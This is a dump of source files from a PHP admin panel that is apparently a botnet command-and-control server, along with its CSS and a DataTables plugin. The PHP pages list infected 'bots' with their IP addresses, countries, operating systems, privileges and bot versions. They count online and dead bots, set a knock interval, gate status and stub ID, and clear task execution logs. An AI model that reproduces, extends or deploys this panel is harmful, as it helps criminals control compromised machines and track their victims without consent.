Mate Rio - Admin Template 3 | Framework: Materialize 4 | Version: 1.0 stable 5 | Author: Jozef Dvorský, http://www.creatingo.com 6 | +-------------------------------------------------- */ 7 | 8 | /* Homepage preloader */ 9 | .loading { 10 | overflow: hidden; } 11 | 12 | .stage-wrapper { 13 | display: none; } 14 | 15 | .loading .stage-wrapper { 16 | width: 100%; 17 | height: 100%; 18 | position: fixed; 19 | display: table; 20 | margin: 0; 21 | padding: 0; 22 | z-index: 10000; } 23 | .loading .stage-wrapper .stage { 24 | width: 100%; 25 | height: 100%; 26 | display: table-cell; 27 | margin: 0; 28 | padding: 0; 29 | vertical-align: middle; 30 | text-align: center; 31 | background-color: #f5fcff; } 32 | 33 | .preloader-wrapper { 34 | display: inline-block; 35 | position: relative; 36 | width: 48px; 37 | height: 48px; } 38 | 39 | .preloader-wrapper.big { 40 | width: 64px; 41 | height: 64px; } 42 | .preloader-wrapper.active { 43 | /* duration: 360 * ARCTIME / (ARCSTARTROT + (360-ARCSIZE)) */ 44 | -webkit-animation: container-rotate 1568ms linear infinite; 45 | animation: container-rotate 1568ms linear infinite; } 46 | 47 | @-webkit-keyframes container-rotate { 48 | to { 49 | -webkit-transform: rotate(360deg); } } 50 | @keyframes container-rotate { 51 | to { 52 | transform: rotate(360deg); } } 53 | .spinner-layer { 54 | position: absolute; 55 | width: 100%; 56 | height: 100%; 57 | opacity: 0; 58 | border-color: #546e7a; } 59 | 60 | 61 | .active .spinner-layer 62 | { 63 | /* durations: 4 * ARCTIME */ 64 | opacity: 1; 65 | -webkit-animation: fill-unfill-rotate 5332ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; 66 | animation: fill-unfill-rotate 5332ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; } 67 | 68 | @-webkit-keyframes fill-unfill-rotate { 69 | 12.5% { 70 | -webkit-transform: rotate(135deg); } 71 | /* 0.5 * ARCSIZE */ 72 | 25% { 73 | -webkit-transform: rotate(270deg); } 74 | /* 1 * ARCSIZE */ 75 | 37.5% { 76 | -webkit-transform: rotate(405deg); } 77 | /* 1.5 * ARCSIZE */ 78 | 50% { 79 | -webkit-transform: rotate(540deg); } 80 | /* 2 * ARCSIZE */ 81 | 62.5% { 82 | -webkit-transform: rotate(675deg); } 83 | /* 2.5 * ARCSIZE */ 84 | 75% { 85 | -webkit-transform: rotate(810deg); } 86 | /* 3 * ARCSIZE */ 87 | 87.5% { 88 | -webkit-transform: rotate(945deg); } 89 | /* 3.5 * ARCSIZE */ 90 | to { 91 | -webkit-transform: rotate(1080deg); } 92 | /* 4 * ARCSIZE */ } 93 | @keyframes fill-unfill-rotate { 94 | 12.5% { 95 | transform: rotate(135deg); } 96 | /* 0.5 * ARCSIZE */ 97 | 25% { 98 | transform: rotate(270deg); } 99 | /* 1 * ARCSIZE */ 100 | 37.5% { 101 | transform: rotate(405deg); } 102 | /* 1.5 * ARCSIZE */ 103 | 50% { 104 | transform: rotate(540deg); } 105 | /* 2 * ARCSIZE */ 106 | 62.5% { 107 | transform: rotate(675deg); } 108 | /* 2.5 * ARCSIZE */ 109 | 75% { 110 | transform: rotate(810deg); } 111 | /* 3 * ARCSIZE */ 112 | 87.5% { 113 | transform: rotate(945deg); } 114 | /* 3.5 * ARCSIZE */ 115 | to { 116 | transform: rotate(1080deg); } 117 | /* 4 * ARCSIZE */ } 118 | 119 | .gap-patch { 120 | position: absolute; 121 | top: 0; 122 | left: 45%; 123 | width: 10%; 124 | height: 100%; 125 | overflow: hidden; 126 | border-color: inherit; } 127 | 128 | .gap-patch .circle { 129 | width: 1000%; 130 | left: -450%; } 131 | 132 | .circle-clipper { 133 | display: inline-block; 134 | position: relative; 135 | width: 50%; 136 | height: 100%; 137 | overflow: hidden; 138 | border-color: inherit; } 139 | .circle-clipper .circle { 140 | width: 200%; 141 | height: 100%; 142 | border-width: 3px; 143 | /* STROKEWIDTH */ 144 | border-style: solid; 145 | border-color: inherit; 146 | border-bottom-color: transparent !important; 147 | border-radius: 50%; 148 | -webkit-animation: none; 149 | animation: none; 150 | position: absolute; 151 | top: 0; 152 | right: 0; 153 | bottom: 0; } 154 | .circle-clipper.left .circle { 155 | left: 0; 156 | border-right-color: transparent !important; 157 | -webkit-transform: rotate(129deg); 158 | transform: rotate(129deg); } 159 | .circle-clipper.right .circle { 160 | left: -100%; 161 | border-left-color: transparent !important; 162 | -webkit-transform: rotate(-129deg); 163 | transform: rotate(-129deg); } 164 | 165 | .active .circle-clipper.left .circle { 166 | /* duration: ARCTIME */ 167 | -webkit-animation: left-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; 168 | animation: left-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; } 169 | 170 | .active .circle-clipper.right .circle { 171 | /* duration: ARCTIME */ 172 | -webkit-animation: right-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; 173 | animation: right-spin 1333ms cubic-bezier(0.4, 0, 0.2, 1) infinite both; } 174 | 175 | @-webkit-keyframes left-spin { 176 | from { 177 | -webkit-transform: rotate(130deg); } 178 | 50% { 179 | -webkit-transform: rotate(-5deg); } 180 | to { 181 | -webkit-transform: rotate(130deg); } } 182 | @keyframes left-spin { 183 | from { 184 | transform: rotate(130deg); } 185 | 50% { 186 | transform: rotate(-5deg); } 187 | to { 188 | transform: rotate(130deg); } } 189 | @-webkit-keyframes right-spin { 190 | from { 191 | -webkit-transform: rotate(-130deg); } 192 | 50% { 193 | -webkit-transform: rotate(5deg); } 194 | to { 195 | -webkit-transform: rotate(-130deg); } } 196 | @keyframes right-spin { 197 | from { 198 | transform: rotate(-130deg); } 199 | 50% { 200 | transform: rotate(5deg); } 201 | to { 202 | transform: rotate(-130deg); } } 203 | -------------------------------------------------------------------------------- /Panel/pages/edituser.php: -------------------------------------------------------------------------------- 1 | 4 |
5 |
6 |

Edit User

7 |
8 |
9 | You do not have permission to view this page.
'; 13 | die(); 14 | } 15 | if (!isset($_GET['id'])) 16 | { 17 | echo '
No ID provided. Redirecting...
'; 18 | die(); 19 | }else{ 20 | if (!ctype_digit($_GET['id'])) 21 | { 22 | echo '
ID was not a digit. Redirecting...
'; 23 | die(); 24 | } 25 | } 26 | $uid = $_GET['id']; 27 | $cnt = $odb->prepare("SELECT COUNT(*) FROM users WHERE id = :i"); 28 | $cnt->execute(array(":i" => $uid)); 29 | if ($cnt->fetchColumn(0) == "0") 30 | { 31 | echo '
User was not found in database. Redirecting...
'; 32 | die(); 33 | } 34 | if ($uid == "1") 35 | { 36 | echo '
This user cannot be modified. Redirecting...
'; 37 | die(); 38 | } 39 | $uss = $odb->prepare("SELECT * FROM users WHERE id = :i"); 40 | $uss->execute(array(":i" => $uid)); 41 | $us = $uss->fetch(PDO::FETCH_ASSOC); 42 | if (isset($_POST['doEdit'])) 43 | { 44 | $npass = $_POST['newpass']; 45 | $npcon = $_POST['newpass2']; 46 | $newpe = $_POST['perms']; 47 | $newst = $_POST['status']; 48 | if (empty($npass) || empty($npcon) || empty($newpe) || empty($newst)) 49 | { 50 | echo '
One of the fields were empty.
'; 51 | }else{ 52 | if ($npass == $npcon) 53 | { 54 | if (ctype_digit($newpe)) 55 | { 56 | if (ctype_digit($newst)) 57 | { 58 | $newperm = ""; 59 | switch ($newpe) 60 | { 61 | case "1": 62 | $newperm = "user"; 63 | break; 64 | case "2": 65 | $newperm = "moderator"; 66 | break; 67 | case "3": 68 | $newperm = "admin"; 69 | break; 70 | } 71 | if ($userperms == "moderator" && $us['privileges'] != "admin") 72 | { 73 | if ($npass != "" || $npass != NULL) 74 | { 75 | $hashed = hash("sha256", $npass); 76 | $up = $odb->prepare("UPDATE users SET password = :p, privileges = :pm, status = :s WHERE id = :i"); 77 | $up->execute(array(":p" => $hashed, ":pm" => $newperm, ":s" => $newst, ":i" => $uid)); 78 | $in = $odb->prepare("INSERT INTO plogs VALUES(NULL, :u, :ip, :r, UNIX_TIMESTAMP())"); 79 | $in->execute(array(":u" => $username, ":ip" => $_SESSION['REMOTE_ADDR'], ":r" => "Edited user ".$us['username'])); 80 | echo '
Successfully updated user. Reloading...
'; 81 | }else{ 82 | $up = $odb->prepare("UPDATE users SET privileges = :p, status = :s WHERE id = :i"); 83 | $up->execute(array(":p" => $newperm, ":s" => $newst, ":i" => $uid)); 84 | $in = $odb->prepare("INSERT INTO plogs VALUES(NULL, :u, :ip, :r, UNIX_TIMESTAMP())"); 85 | $in->execute(array(":u" => $username, ":ip" => $_SESSION['REMOTE_ADDR'], ":r" => "Edited user ".$us['username'])); 86 | echo '
Successfully updated user. Reloading...
'; 87 | } 88 | }else{ 89 | echo '
You cannot edit administrative users.
'; 90 | } 91 | }else{ 92 | echo '
Status was not a digit.
'; 93 | } 94 | }else{ 95 | echo '
Permissions was not a digit.
'; 96 | } 97 | }else{ 98 | echo '
Passwords did not match.
'; 99 | } 100 | } 101 | } 102 | ?> 103 | 104 |
105 |
106 |
107 | Go Back 108 |
Editing user
109 |
110 |
111 | 112 | 113 |
114 | 115 | 116 |
117 | 118 | 134 |
135 | 136 | 146 |
147 |
148 |
149 |
150 |
151 |
152 |
153 |
154 | 155 |
156 | -------------------------------------------------------------------------------- /Panel/assets/js/dataTables.bootstrap.js: -------------------------------------------------------------------------------- 1 | /* Set the defaults for DataTables initialisation */ 2 | $.extend( true, $.fn.dataTable.defaults, { 3 | "sDom": 4 | "<'row'<'col-xs-6'l><'col-xs-6'f>r>"+ 5 | "t"+ 6 | "<'row'<'col-xs-6'i><'col-xs-6'p>>", 7 | "oLanguage": { 8 | "sLengthMenu": "_MENU_ records per page" 9 | } 10 | } ); 11 | 12 | 13 | /* Default class modification */ 14 | $.extend( $.fn.dataTableExt.oStdClasses, { 15 | "sWrapper": "dataTables_wrapper form-inline", 16 | "sFilterInput": "form-control input-sm", 17 | "sLengthSelect": "form-control input-sm" 18 | } ); 19 | 20 | // In 1.10 we use the pagination renderers to draw the Bootstrap paging, 21 | // rather than custom plug-in 22 | if ( $.fn.dataTable.Api ) { 23 | $.fn.dataTable.defaults.renderer = 'bootstrap'; 24 | $.fn.dataTable.ext.renderer.pageButton.bootstrap = function ( settings, host, idx, buttons, page, pages ) { 25 | var api = new $.fn.dataTable.Api( settings ); 26 | var classes = settings.oClasses; 27 | var lang = settings.oLanguage.oPaginate; 28 | var btnDisplay, btnClass; 29 | 30 | var attach = function( container, buttons ) { 31 | var i, ien, node, button; 32 | var clickHandler = function ( e ) { 33 | e.preventDefault(); 34 | if ( e.data.action !== 'ellipsis' ) { 35 | api.page( e.data.action ).draw( false ); 36 | } 37 | }; 38 | 39 | for ( i=0, ien=buttons.length ; i 0 ? 58 | '' : ' disabled'); 59 | break; 60 | 61 | case 'previous': 62 | btnDisplay = lang.sPrevious; 63 | btnClass = button + (page > 0 ? 64 | '' : ' disabled'); 65 | break; 66 | 67 | case 'next': 68 | btnDisplay = lang.sNext; 69 | btnClass = button + (page < pages-1 ? 70 | '' : ' disabled'); 71 | break; 72 | 73 | case 'last': 74 | btnDisplay = lang.sLast; 75 | btnClass = button + (page < pages-1 ? 76 | '' : ' disabled'); 77 | break; 78 | 79 | default: 80 | btnDisplay = button + 1; 81 | btnClass = page === button ? 82 | 'active' : ''; 83 | break; 84 | } 85 | 86 | if ( btnDisplay ) { 87 | node = $('
  • ', { 88 | 'class': classes.sPageButton+' '+btnClass, 89 | 'aria-controls': settings.sTableId, 90 | 'tabindex': settings.iTabIndex, 91 | 'id': idx === 0 && typeof button === 'string' ? 92 | settings.sTableId +'_'+ button : 93 | null 94 | } ) 95 | .append( $('', { 96 | 'href': '#' 97 | } ) 98 | .html( btnDisplay ) 99 | ) 100 | .appendTo( container ); 101 | 102 | settings.oApi._fnBindAction( 103 | node, {action: button}, clickHandler 104 | ); 105 | } 106 | } 107 | } 108 | }; 109 | 110 | attach( 111 | $(host).empty().html('
      ').children('ul'), 112 | buttons 113 | ); 114 | } 115 | } 116 | else { 117 | // Integration for 1.9- 118 | $.fn.dataTable.defaults.sPaginationType = 'bootstrap'; 119 | 120 | /* API method to get paging information */ 121 | $.fn.dataTableExt.oApi.fnPagingInfo = function ( oSettings ) 122 | { 123 | return { 124 | "iStart": oSettings._iDisplayStart, 125 | "iEnd": oSettings.fnDisplayEnd(), 126 | "iLength": oSettings._iDisplayLength, 127 | "iTotal": oSettings.fnRecordsTotal(), 128 | "iFilteredTotal": oSettings.fnRecordsDisplay(), 129 | "iPage": oSettings._iDisplayLength === -1 ? 130 | 0 : Math.ceil( oSettings._iDisplayStart / oSettings._iDisplayLength ), 131 | "iTotalPages": oSettings._iDisplayLength === -1 ? 132 | 0 : Math.ceil( oSettings.fnRecordsDisplay() / oSettings._iDisplayLength ) 133 | }; 134 | }; 135 | 136 | /* Bootstrap style pagination control */ 137 | $.extend( $.fn.dataTableExt.oPagination, { 138 | "bootstrap": { 139 | "fnInit": function( oSettings, nPaging, fnDraw ) { 140 | var oLang = oSettings.oLanguage.oPaginate; 141 | var fnClickHandler = function ( e ) { 142 | e.preventDefault(); 143 | if ( oSettings.oApi._fnPageChange(oSettings, e.data.action) ) { 144 | fnDraw( oSettings ); 145 | } 146 | }; 147 | 148 | $(nPaging).append( 149 | '' 153 | ); 154 | var els = $('a', nPaging); 155 | $(els[0]).bind( 'click.DT', { action: "previous" }, fnClickHandler ); 156 | $(els[1]).bind( 'click.DT', { action: "next" }, fnClickHandler ); 157 | }, 158 | 159 | "fnUpdate": function ( oSettings, fnDraw ) { 160 | var iListLength = 5; 161 | var oPaging = oSettings.oInstance.fnPagingInfo(); 162 | var an = oSettings.aanFeatures.p; 163 | var i, ien, j, sClass, iStart, iEnd, iHalf=Math.floor(iListLength/2); 164 | 165 | if ( oPaging.iTotalPages < iListLength) { 166 | iStart = 1; 167 | iEnd = oPaging.iTotalPages; 168 | } 169 | else if ( oPaging.iPage <= iHalf ) { 170 | iStart = 1; 171 | iEnd = iListLength; 172 | } else if ( oPaging.iPage >= (oPaging.iTotalPages-iHalf) ) { 173 | iStart = oPaging.iTotalPages - iListLength + 1; 174 | iEnd = oPaging.iTotalPages; 175 | } else { 176 | iStart = oPaging.iPage - iHalf + 1; 177 | iEnd = iStart + iListLength - 1; 178 | } 179 | 180 | for ( i=0, ien=an.length ; i'+j+'') 188 | .insertBefore( $('li:last', an[i])[0] ) 189 | .bind('click', function (e) { 190 | e.preventDefault(); 191 | oSettings._iDisplayStart = (parseInt($('a', this).text(),10)-1) * oPaging.iLength; 192 | fnDraw( oSettings ); 193 | } ); 194 | } 195 | 196 | // Add / remove disabled classes from the static elements 197 | if ( oPaging.iPage === 0 ) { 198 | $('li:first', an[i]).addClass('disabled'); 199 | } else { 200 | $('li:first', an[i]).removeClass('disabled'); 201 | } 202 | 203 | if ( oPaging.iPage === oPaging.iTotalPages-1 || oPaging.iTotalPages === 0 ) { 204 | $('li:last', an[i]).addClass('disabled'); 205 | } else { 206 | $('li:last', an[i]).removeClass('disabled'); 207 | } 208 | } 209 | } 210 | } 211 | } ); 212 | } 213 | 214 | 215 | /* 216 | * TableTools Bootstrap compatibility 217 | * Required TableTools 2.1+ 218 | */ 219 | if ( $.fn.DataTable.TableTools ) { 220 | // Set the classes that TableTools uses to something suitable for Bootstrap 221 | $.extend( true, $.fn.DataTable.TableTools.classes, { 222 | "container": "DTTT btn-group", 223 | "buttons": { 224 | "normal": "btn btn-default", 225 | "disabled": "disabled" 226 | }, 227 | "collection": { 228 | "container": "DTTT_dropdown dropdown-menu", 229 | "buttons": { 230 | "normal": "", 231 | "disabled": "disabled" 232 | } 233 | }, 234 | "print": { 235 | "info": "DTTT_print_info modal" 236 | }, 237 | "select": { 238 | "row": "active" 239 | } 240 | } ); 241 | 242 | // Have the collection use a bootstrap compatible dropdown 243 | $.extend( true, $.fn.DataTable.TableTools.DEFAULTS.oTags, { 244 | "collection": { 245 | "container": "ul", 246 | "button": "li", 247 | "liner": "a" 248 | } 249 | } ); 250 | } -------------------------------------------------------------------------------- /Panel/pages/settings.php: -------------------------------------------------------------------------------- 1 | 4 |
      5 |
      6 |

      Settings

      7 |
      8 |
      9 | 10 | You do not have permission to view this page.
      '; 14 | die(); 15 | } 16 | if (isset($_GET['clear'])) 17 | { 18 | $clear = strtolower($_GET['clear']); 19 | $safe = array("dead", "offline", "dirty", "all", "tasklogs"); 20 | if (in_array($clear, $safe)) 21 | { 22 | if ($clear == "dead") 23 | { 24 | $d = $odb->prepare("DELETE FROM bots WHERE lastresponse + :d < UNIX_TIMESTAMP()"); 25 | $d->execute(array(":d" => $deadi)); 26 | $i = $odb->prepare("INSERT INTO plogs VALUES(NULL, :u, :ip, 'Cleared dead bots from table', UNIX_TIMESTAMP())"); 27 | $i->execute(array(":u" => $username, ":ip" => $_SERVER['REMOTE_ADDR'])); 28 | }else if ($clear == "offline"){ 29 | $o = $odb->prepare("DELETE FROM bots WHERE (lastresponse + :o < UNIX_TIMESTAMP()) AND (lastresponse + :d > UNIX_TIMESTAMP())"); 30 | $o->execute(array(":o" => $knock + 120, ":d" => $deadi)); 31 | $i = $odb->prepare("INSERT INTO plogs VALUES(NULL, :u, :ip, 'Cleared offline bots from table', UNIX_TIMESTAMP())"); 32 | $i->execute(array(":u" => $username, ":ip" => $_SERVER['REMOTE_ADDR'])); 33 | }else if ($clear == "dirty"){ 34 | $odb->query("DELETE FROM bots WHERE mark = '2'"); 35 | $i = $odb->prepare("INSERT INTO plogs VALUES(NULL, :u, :ip, 'Cleared dirty bots from table', UNIX_TIMESTAMP()"); 36 | $i->execute(array(":u" => $username, ":ip" => $_SERVER['REMOTE_ADDR'])); 37 | }else if ($clear == "tasklogs"){ 38 | $odb->query("TRUNCATE tasks_completed"); 39 | $i = $odb->prepare("INSERT INTO plogs VALUES(NULL, :u, :ip, 'Cleared task execution logs from table', UNIX_TIMESTAMP()"); 40 | $i->execute(array(":u" => $username, ":ip" => $_SERVER['REMOTE_ADDR'])); 41 | }else{ 42 | $odb->query("TRUNCATE bots"); 43 | $i = $odb->prepare("INSERT INTO plogs VALUES(NULL, :u, :ip, 'Cleared all bots from table', UNIX_TIMESTAMP()"); 44 | $i->execute(array(":u" => $username, ":ip" => $_SERVER['REMOTE_ADDR'])); 45 | } 46 | echo '
      Successfully cleared entries. Reloading...
      '; 47 | }else{ 48 | echo '
      Invalid clear option. Reloading...
      '; 49 | } 50 | } 51 | if (isset($_POST['updateSettings'])) 52 | {$newstub_id = $_POST['stub']; 53 | $newknock = $_POST['knock']; 54 | $newdead = $_POST['dead']; 55 | $newgate = $_POST['gstatus']; 56 | 57 | if (!ctype_digit($newknock) || !ctype_digit($newdead) || !ctype_digit($newgate) ) 58 | { 59 | echo '
      One of the parameters was not a digit. Reloading...
      '; 60 | }else{ 61 | $up = $odb->prepare("UPDATE settings SET knock = :k, dead = :d, gate_status = :g, stub_id = :s LIMIT 1"); 62 | $up->execute(array(":k" => $newknock, ":d" => $newdead, ":g" => $newgate, ":s" => $newstub_id)); 63 | $i = $odb->prepare("INSERT INTO plogs VALUES(NULL, :u, :ip, 'Updated panel settings', UNIX_TIMESTAMP())"); 64 | $i->execute(array(":u" => $username, ":ip" => $_SERVER['REMOTE_ADDR'])); 65 | echo '
      Settings successfully updated. Reloading...
      '; 66 | 67 | } 68 | } 69 | ?>
      70 | 76 |
      77 |
      78 |
      79 |
      80 | 81 |
      82 | fetchColumn(0); ?>"> 83 | 84 |
      85 |
      86 | 87 |
      88 | fetchColumn(0); ?>"> 89 | Minutes 90 |
      91 |
      92 | 93 |
      94 | fetchColumn(0); ?>"> 95 | Days 96 |
      97 |
      98 | 99 | 110 |
      111 | 112 |
      113 |
      114 |
      115 |
      116 |
      117 |
      118 |
      119 | 120 |
      121 |
      122 |

      Statistics

      123 |

      The database is currently using query("SELECT ROUND(SUM(data_length + index_length) / 1024, 2) FROM information_schema.TABLES WHERE table_schema = (SELECT DATABASE())")->fetchColumn(0); ?> KB of space, with query("SELECT SUM(table_rows) FROM information_schema.TABLES WHERE table_schema = (SELECT DATABASE())")->fetchColumn(0)); ?> rows in total.

      124 |
      125 |

      Optimization

      126 | Clear Dead Bots 127 | Clear Offline Bots 128 | Clear Dirty Bots 129 | Clear All Bots 130 | Clear Task Execution Logs 131 |
      132 |
      133 |
      134 |
      135 |
      136 | 137 | 138 |
      139 | 140 | 141 | 142 | 159 |
      160 | -------------------------------------------------------------------------------- /Panel/pages/main.php: -------------------------------------------------------------------------------- 1 | 4 |
      5 |
      6 |

      Dashboard

      7 |
      8 |
      9 |
      10 |
      11 |
      12 | 13 |

        Bots Online

      14 |
      15 |
      16 |
      17 |
      18 |
      19 |
      20 | 21 |

        Dead Bots

      22 |
      23 |
      24 |
      25 |
      26 |
      27 |
      28 | 29 |

        Total Bots

      30 |
      31 |
      32 |
      33 |
      34 |
      35 |
      36 | 37 |

        Users

      38 |
      39 |
      40 |
      41 |
      42 |
      43 |
      44 |
      45 |
      46 | Last 5 Installations 47 |
      48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | query("SELECT * FROM bots ORDER BY installdate DESC LIMIT 5"); 65 | while ($b = $bots->fetch(PDO::FETCH_ASSOC)) 66 | { 67 | $id = $b['id']; 68 | $ip = $b['ipaddress']; 69 | $cn = geoip_country_name_by_id($gi, $b['country']); 70 | $fl = strtolower(geoip_country_code_by_id($gi, $b['country'])); 71 | $in = date("m-d-Y, h:i A", $b['installdate']); 72 | $os = $b['operatingsys']; 73 | $pv = $b['privileges']; 74 | $bv = $b['botversion']; 75 | echo ''; 76 | } 77 | }else{ 78 | echo ''; 79 | } 80 | ?> 81 | 82 |
      #IP AddressCountryInstall DateOperating SystemPrivilegesBot Version
      '.$id.''.$ip.''.$cn.'  '.$in.''.$os.''.$pv.''.$bv.'
      No data to display
      83 |
      84 |
      85 |
      86 |
      87 |
      88 |
      89 |
      90 | Top 10 Operating Systems 91 |
      92 | 93 |
      94 | 95 |
      96 | 97 |
      98 |
      99 | 100 | 101 |
      102 |
      103 |
      104 |
      105 | Privileges 106 |
      107 | 108 |
      109 | 110 |
      111 |
      112 |
      113 |
      114 |
      115 | 116 |
      117 |
      118 |
      119 | Top Countries 120 | 121 |
      122 |
      123 | 124 |
      125 |
      126 |
      127 | 128 |
      129 | 130 | 131 | 132 | 133 |
      134 | 136 | 137 | 138 | -------------------------------------------------------------------------------- /Panel/assets/css/login.css: -------------------------------------------------------------------------------- 1 | * { 2 | margin: 0; 3 | padding: 0; 4 | } 5 | h1 { 6 | font-size: 2em; 7 | font-family: "Core Sans N W01 35 Light"; 8 | font-weight: normal; 9 | margin: .67em 0; 10 | display: block; 11 | } 12 | #registered { 13 | margin-top: 50px; 14 | } 15 | #registered img { 16 | margin-bottom: 0px; 17 | width: 100px; 18 | height: 100px; 19 | } 20 | #registered span { 21 | clear: both; 22 | display: block; 23 | } 24 | img { 25 | margin-bottom: 20px; 26 | } 27 | .module { 28 | position: relative; 29 | top: 10%; 30 | height: 65%; 31 | width: 450px; 32 | margin-left: auto; 33 | margin-right: auto; 34 | } 35 | .user { 36 | color: #66d8fc; 37 | font-weight: bold; 38 | } 39 | .userlist { 40 | float: left; 41 | padding: 30px; 42 | } 43 | .userlist span { 44 | color: #0590fc; 45 | } 46 | .welcome { 47 | position: relative; 48 | top: 30%; 49 | height: 65%; 50 | width: 900px; 51 | margin-left: auto; 52 | margin-right: auto; 53 | margin-top: 50px; 54 | } 55 | ::-moz-selection { 56 | background: #19547c; 57 | } 58 | ::selection { 59 | background: #19547c; 60 | } 61 | input::-moz-selection { 62 | background: #037db6; 63 | } 64 | input::selection { 65 | background: #037db6; 66 | } 67 | body { 68 | color: #0b90cd; 69 | background-color: #0b90cd; 70 | font-family: Arial; 71 | background: url('../images/login.jpg') #ffffff no-repeat center top; 72 | } 73 | .body-content { 74 | position: relative; 75 | margin-top: 15%; 76 | height: 100%; 77 | width: 800px; 78 | margin-left: 40%; 79 | background: transparent; 80 | } 81 | .body2-content { 82 | position: relative; 83 | margin-top: 10%; 84 | height: 100%; 85 | width: 800px; 86 | margin-left: 40%; 87 | background: transparent; 88 | } 89 | select, textarea, input[type=number], input[type=url], input[type=file], input[type="text"], input[type="password"], input[type="email"] { 90 | height: 30px; 91 | width: 100%; 92 | ; 93 | display: inline-block; 94 | vertical-align: middle; 95 | height: 34px; 96 | padding: 0 10px; 97 | margin-top: 3px; 98 | margin-bottom: 10px; 99 | font-size: 15px; 100 | line-height: 20px; 101 | border: 1px solid rgba(255, 255, 255, 0.3); 102 | background-color: rgba(0, 0, 0, 0.5); 103 | color: rgba(255, 255, 255, 0.7); 104 | -moz-box-sizing: border-box; 105 | box-sizing: border-box; 106 | border-radius: 2px; 107 | } 108 | select, textarea, input[type="text"], input[type=number], input[type=file], input[type=url], input[type="password"], input[type="email"] { 109 | -webkit-appearance: none; 110 | -moz-appearance: none; 111 | -ms-appearance: none; 112 | appearance: none; 113 | -webkit-transition: background-position 0.2s, background-color 0.2s, border-color 0.2s, box-shadow 0.2s; 114 | transition: background-position 0.2s, background-color 0.2s, border-color 0.2s, box-shadow 0.2s; 115 | } 116 | select:hover, textarea:hover, input[type=number]:hover, input[type=url] :hover, input[type="text"]:hover, input[type="password"]:hover, input[type="email"]:hover { 117 | border-color: rgba(255, 255, 255, 0.5); 118 | background-color: rgba(0, 0, 0, 0.5); 119 | color: rgba(255, 255, 255, 0.7); 120 | } 121 | select:focus, textarea:focus, input[type=number]:focus, input[type=url]:focus, input[type="text"]:focus, input[type="password"]:focus, input[type="email"]:focus { 122 | border: 2px solid; 123 | border-color: #1e5f99; 124 | background-color: rgba(0, 0, 0, 0.5); 125 | color: #ffffff; 126 | } 127 | .btn { 128 | text-overflow: ellipsis; 129 | white-space: nowrap; 130 | overflow: hidden; 131 | margin: 3px 0; 132 | padding: 6px 20px; 133 | font-size: 15px; 134 | line-height: 20px; 135 | height: 34px; 136 | background-color: rgba(0, 0, 0, 0.15); 137 | color: #00aeff; 138 | border: 1px solid rgba(255, 255, 255, 0.15); 139 | box-shadow: 0 0 rgba(0, 0, 0, 0); 140 | border-radius: 2px; 141 | -webkit-transition: background-color 0.2s, box-shadow 0.2s, background-color 0.2s, border-color 0.2s, color 0.2s; 142 | transition: background-color 0.2s, box-shadow 0.2s, background-color 0.2s, border-color 0.2s, color 0.2s; 143 | } 144 | .btn.active, .btn:active { 145 | padding: 7px 19px 5px 21px; 146 | } 147 | .btn.disabled:active, .btn[disabled]:active, .btn.disabled.active, .btn[disabled].active { 148 | padding: 6px 20px !important; 149 | } 150 | .btn:hover, .btn:focus { 151 | background-color: rgba(0, 0, 0, 0.25); 152 | color: #ffffff; 153 | border-color: rgba(255, 255, 255, 0.3); 154 | box-shadow: 0 0 rgba(0, 0, 0, 0); 155 | } 156 | .btn:active, .btn.active { 157 | background-color: rgba(0, 0, 0, 0.15); 158 | color: rgba(255, 255, 255, 0.8); 159 | border-color: rgba(255, 255, 255, 0.07); 160 | box-shadow: inset 1.5px 1.5px 3px rgba(0, 0, 0, 0.5); 161 | } 162 | .btn-primary { 163 | background-color: #098cc8; 164 | color: #ffffff; 165 | border: 1px solid transparent; 166 | box-shadow: 0 0 rgba(0, 0, 0, 0); 167 | border-radius: 2px; 168 | -webkit-transition: background-color 0.2s, box-shadow 0.2s, background-color 0.2s, border-color 0.2s, color 0.2s; 169 | transition: background-color 0.2s, box-shadow 0.2s, background-color 0.2s, border-color 0.2s, color 0.2s; 170 | background-image: -webkit-linear-gradient(top, #0f9ada, #0076ad); 171 | background-image: linear-gradient(to bottom, #0f9ada, #0076ad); 172 | border: 0; 173 | box-shadow: 0 1px 1px rgba(0, 0, 0, 0.3), 0 0 0 1px rgba(255, 255, 255, 0.15) inset; 174 | } 175 | .btn-primary:hover, .btn-primary:focus { 176 | background-color: #21b0f1; 177 | color: #ffffff; 178 | border-color: transparent; 179 | box-shadow: 0 0 rgba(0, 0, 0, 0); 180 | } 181 | .btn-primary:active, .btn-primary.active { 182 | background-color: #006899; 183 | color: rgba(255, 255, 255, 0.7); 184 | border-color: transparent; 185 | box-shadow: inset 1.5px 1.5px 3px rgba(0, 0, 0, 0.5); 186 | } 187 | .btn-primary:hover, .btn-primary:focus { 188 | background-image: -webkit-linear-gradient(top, #37c0ff, #0097dd); 189 | background-image: linear-gradient(to bottom, #37c0ff, #0097dd); 190 | } 191 | .btn-primary:active, .btn-primary.active { 192 | background-image: -webkit-linear-gradient(top, #006ea1, #00608d); 193 | background-image: linear-gradient(to bottom, #006ea1, #00608d); 194 | box-shadow: 1px 1px 2px rgba(0, 0, 0, 0.6) inset, 0 0 0 1px rgba(255, 255, 255, 0.07) inset; 195 | } 196 | .btn-block { 197 | display: block; 198 | width: 100%; 199 | padding-left: 0; 200 | padding-right: 0; 201 | } 202 | .alert { 203 | -moz-box-sizing: border-box; 204 | box-sizing: border-box; 205 | padding: 4px 20px 4px 20px; 206 | font-size: 13px; 207 | line-height: 20px; 208 | margin-bottom: 20px; 209 | text-shadow: none; 210 | position: relative; 211 | background-color: #ffffff; 212 | color: rgba(255, 255, 255, 0.7); 213 | } 214 | .alert-error { 215 | color: #f00; 216 | background-color: #e6e6e6; 217 | } 218 | .alert:empty { 219 | display: none; 220 | } 221 | .alert-success { 222 | color: #21ec0c; 223 | background-color: #15360e; 224 | box-shadow: 0 0 0 1px #2a551e inset, 0 5px 10px rgba(0, 0, 0, 0.75); 225 | } 226 | .btn1 { 227 | text-overflow: ellipsis; 228 | white-space: nowrap; 229 | overflow: hidden; 230 | margin: 3px 0; 231 | padding: 6px 20px; 232 | font-size: 15px; 233 | line-height: 20px; 234 | height: 34px; 235 | width: 224px; 236 | background-color: rgba(0, 0, 0, 0.15); 237 | 